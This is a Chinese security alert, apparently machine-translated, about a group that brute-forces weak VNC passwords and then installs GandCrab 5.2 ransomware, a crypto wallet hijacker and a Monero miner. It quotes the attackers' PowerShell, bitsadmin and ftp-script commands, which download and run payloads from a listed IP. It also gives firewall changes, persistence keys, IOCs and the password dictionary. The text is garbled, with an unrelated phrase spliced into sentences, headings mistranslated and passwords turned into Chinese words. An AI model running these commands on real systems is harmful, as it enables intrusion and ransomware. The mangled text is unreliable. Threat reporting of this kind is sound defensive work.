“VNC大盗”攻击预警：中招公司遭遇GandCrab 5.2等病毒系列严重攻击

咪咪威胁情报中心

一、背景

腾讯御剑威胁情报中心发现远程管理工具VNC大规模扫描检测，攻击者使用弱口令字典爆破运行VNC服务机器的连接。 爆破成功后，该团伙会在中招企业网络中运行各种病毒木马，包括GandCrab 5.2勒索病毒、门罗币挖矿木马、数字货币钱包劫持木马等，下载运行。 腾讯御剑威胁情报中心将该团伙命名为“VNC劫匪”。

VNC 是一种广泛使用的远程管理工具。 如果用户只是为了方便而使用简单的密码，就会给“VNC强盗”可乘之机。 “VNC强盗”攻击的手势必然会导致服务器被黑客远程控制，信息泄露不可避免。

攻击者可能会根据服务器的价值运行不同的木马：例如在高价值的服务器上下载并运行GandCrab 5.2勒索病毒，对重要的系统数据进行加密进行勒索； 如果有数字货币交易的电脑被攻破，运行数字货币钱包劫持木马抢钱； 如果被攻击的电脑只是一台普通电脑，没有勒索价值比特币钱包添加节点命令，就会被植入门罗币挖矿木马，成为“VNC劫匪”控制的矿工电脑。

腾讯安全专家建议使用VNC远程管理工具的企业网络管理员尽快更改管理员密码，切勿使用弱密码配置远程管理工具。 一旦被黑客暴力破解，将给企业造成无法挽回的损失。

2、技术分析

2.1. 爆破攻击

VNC是一种广泛使用的远程控制管理工具。 它使用RFB协议进行屏幕共享和远程操作。 通过VNC，用户可以随时随地访问和控制远程桌面应用程序。 黑客针对VNC弱口令爆破连接，然后执行命令下载并植入木马。

攻击样本执行后，将文件复制到windows目录C:\Windows\4636436463467537357\winsecmgrv.exe

写入注册表添加为启动项

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Security Svcscs

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Security Svcscs

在 while 循环中生成一个随机 IP 地址。 生成IP地址时，例如使用ABCD格式的A段范围30-209，B、C、D段范围1-255，去掉127、172、192网络包括 LAN IP 地址。 分割IP，然后为生成的IP创建线程进行爆破攻击。

在开始攻击之前，测试IP是否可以与默认的VNC端口5900建立连接比特币钱包添加节点命令，并获取可用套接字的数量。 如果可用套接字数大于零，使用内置的VNC弱口令登录

使用内置的 VNC 弱密码字典

爆破时通过VNC的RFB协议建立连接

攻击时的网络数据

如果爆破攻击成功，则会通过cmd命令下载并植入木马wuh.exe。 植入木马时，会通过三种方式植入：使用Powershell下载执行、使用bitsadmin下载执行、使用ftp脚本下载执行（将ftp.exe的防火墙规则设置为允许通过）

命令 1：

cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile(,27h,hxxp://92.63.197.153/wuh.exe,%temp%\496004393050.exe,27h,);开始-进程 ,27h,%temp%\496004393050.exe

命令 2：

cmd.exe /c bitsadmin /transfer getitman /download /priority high hxxp://92.63.197.153/wuh.exe %temp%\49506069403.exe&start %temp%\49506069403.exe,0

命令 3：

cmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe "ok" ENABLE&netsh advfirewall firewall add rule dir=in action=allow program="C:\Windows\System32\ftp.exe" enable=yes ,0

cmd.exe /c "cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get wuh .exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start wuh.exe"

2.2.GandCrab 勒索软件

爆破攻击后植入的文件muh.exe是近期流行的勒索病毒GandCrab V5.2版本。 病毒运行后，会对计算机上的文档、图片、数据库等大量重要文件进行加密勒索。 Tor节点：hxxp://gandcrabmfe6mnef.onion/a10a45ae44a96a6e 可以付费介绍，免费解密文件。

详细分析参考：

《GandCrab 5.2勒索软件紧急预警：冒充公安机关实施鱼叉邮件攻击》

2.3. 关联分析

通过关联分析发现，除了GandCrab勒索病毒外，还有通过相同地址（92.63.197.153）和相同攻击方式（VN爆破）传播的数字货币钱包劫持木马和门罗币挖矿木马。 这些木马文件在服务器上 文件名分别为1.exe、2.exe、3.exe等。在VNC爆破攻击成功后，黑客通过下载器木马下载并植入受害者电脑。

2.4. 钱包劫持

木马下载地址hxxp://92.63.197.153/1.exe，木马运行后会打开剪贴板获取内容

根据格式匹配比特币、门罗币、以太坊等12种数字货币的钱包地址。 匹配后替换内置钱包地址，劫持交易过程中的收益。 使用的钱包地址如下：

1EN3bbs8UdVWA3i3ixtB9jQWvPnP9us4va

qrwtjnq8724e4eht9xj5ps4pqn0thxkzkgrwm28qk3

24fVJSDuRdQ9pLqBFaB8bVZ5vMz8ympPbRRm9bf61Hk9EjNb2iL8JAUFr6MNqj3PGR4PGXzCGYQw7UemxRoRxCC97oxADVN

XbRXpWWLbZRyrsGU4SbHYT2yjvmi8p5UNV

DTKLY1JtQTAKjuKAJrjsbrjhSmkFtsKvNV

EbMpWJ7mrq8mPjfc28xJJew1fCLpABc9Ro

0xb6d8926bf0418de68a7544c717bbb4ea198769cc

Lcxcmpj9FZ7Sso8WWsED3h6bZMLYRLcJAh

49n2ySeucB3F4ni2q6So4uNfPbTmLVSNadrHzduqDJXKMDZWnv6VyTYiq4MdEF7jDdCkx9Vkk7gkyGaJs3DiS8TjJQm7cR8

PUJeZbWdjX1pcF6zcvxTynGER1PKpvx3hX

rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ

t1UTEJ9Sv8PCTb72xCkRxc6GiE1cFpANSQ4

目前可以查到比特币钱包收到0.094BTC，以太坊钱包收到0.186ETH。 收入还不够，这也证明“VNC强盗”黑客团伙的活动才刚刚开始。

2.5. 挖矿木马

木马下载地址hxxp://92.63.197.153/2.exe，木马运行后将自身复制到C:\ProgramData\nEzJvZquBf\windvcmgr.exe，并释放base64编码的挖矿配置文件cfg/cfgi

解码配置文件内容，可以看到矿池地址为：

92.63.197.153:7575

登录用户名：cb946e0c-6c88-4e11-881b-56f7ecbda229

创建挖矿木马的快捷方式，并将快捷方式添加到开始菜单中启动

然后在记事本进程中注入门罗币挖矿代码进行挖矿

3. 安全建议

1、使用高强度密码，避免使用弱密码，定期修改密码。 服务器密码建议使用高强度且不规则的密码，并且强制每个服务器使用不同的密码管理。

2、对不需要互联的服务器/工作站的内部访问设置相应的控制，避免可以连接外网的服务器被攻击后，对其他服务器的进一步攻击。

3、定期对重要文件和数据（数据库等）进行异地备份。

4、企业用户可以在服务器上部署腾讯鱼点终端安全管理系统，防止此类病毒入侵。

国际奥委会

MD5

feb8b98d319b6377cd1701decf075d03

f4926ebd721231a04ccc053ba19b9ace

d754256f4758f07b263db0f97c9757e8

3edbca6a02ec2007493fc5fa01ad5093

3a107ad52d454cef69ef95481b27b9e6

cabe7d06f7e01ce4defeb28cbef8f6b4

4467d13fc43281c1767307860a9f7c17

e387bd817e9b7f02fa9c2511cc345f12

7863261cd36717d171825bd82244424d

f8edf799e18062480587d31ed010aec5

4397481fbfffaee44195e0ba8ea8dad5

cfa407c597a0a9edc9f03d38c3078b3c

0f8c6e70d2847d8b77e33b67da163170

d5a5deeacd3f51523092967b7a011804

6ff47ee58649855896cb4d12df89fe81

b57ed88703d7afbbb34d30ab5812ec5e

知识产权

92.63.197.153

领域

rghirgsrogrshggir.ru网站

rghirgsrogrshghsh.ru

rghirgsrogrstjgrr.ru

rghirgsrogddhjtdj.ru

rghirgsrsrgsreidg.ru

rghirgsrfzjjfsrzj.ru

rghirgsrogrsfzjfs.ru

rghirgsrogrsfsegh.ru

rghirgsrogrhdthsr.ru

rghirgsrogrefsesg.ru网站

rghirgsrogrshggirr.su网站

rghirgsrogrshghshr.su

rghirgsrogrstjgrrr.su

rghirgsrogddhjtdjr.su网站

rghirgsrsrgsreidgr.su

rghirgsrfzjjfsrzjr.su

rghirgsrogrsfzjfsr.su

rghirgsrogrsfseghr.su

网址

hxxp://92.63.197.153/1.exe

hxxp://92.63.197.153/2.exe

hxxp://92.63.197.153/3.exe

hxxp://92.63.197.153/4.exe

hxxp://92.63.197.153/5.exe

hxxp://92.63.197.153/wuh.exe

钱包：

1EN3bbs8UdVWA3i3ixtB9jQWvPnP9us4va

qrwtjnq8724e4eht9xj5ps4pqn0thxkzkgrwm28qk3

24fVJSDuRdQ9pLqBFaB8bVZ5vMz8ympPbRRm9bf61Hk9EjNb2iL8JAUFr6MNqj3PGR4PGXzCGYQw7UemxRoRxCC97oxADVN

XbRXpWWLbZRyrsGU4SbHYT2yjvmi8p5UNV

DTKLY1JtQTAKjuKAJrjsbrjhSmkFtsKvNV

EbMpWJ7mrq8mPjfc28xJJew1fCLpABc9Ro

0xb6d8926bf0418de68a7544c717bbb4ea198769cc

Lcxcmpj9FZ7Sso8WWsED3h6bZMLYRLcJAh

49n2ySeucB3F4ni2q6So4uNfPbTmLVSNadrHzduqDJXKMDZWnv6VyTYiq4MdEF7jDdCkx9Vkk7gkyGaJs3DiS8TjJQm7cR8

PUJeZbWdjX1pcF6zcvxTynGER1PKpvx3hX

rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ

t1UTEJ9Sv8PCTb72xCkRxc6GiE1cFpANSQ4

矿池：

92.63.197.153:7575

VNC弱密码

1234

12345

123456

1234567

12345678

123123

12341234

54321

654321

321

321321

1234qwer

密码

密码

密码

经过

通行证123

行政

admin1

行政

行政

admin123

美国广播公司

abcabc

abc123

A B C D

abcd1234

abcde

ASD

阿斯达夫

授权

登录

键盘

qwe123

1q2w3e

q1w2e3r

办公室

虚拟机

vnc123

帐户

vnc vnc

虚拟网络控制器

用户

用户123

用户

测试

测试一下

测试123

测试

服务器

服务器

电脑

个人电脑

客人

家庭用户

信息

甲骨文

互联网

控制

桌面

视窗

监视器

改头换面

温度

经理

所有者

安全的

惯用的

贝努策

持续的

口舌

密码

盖斯洛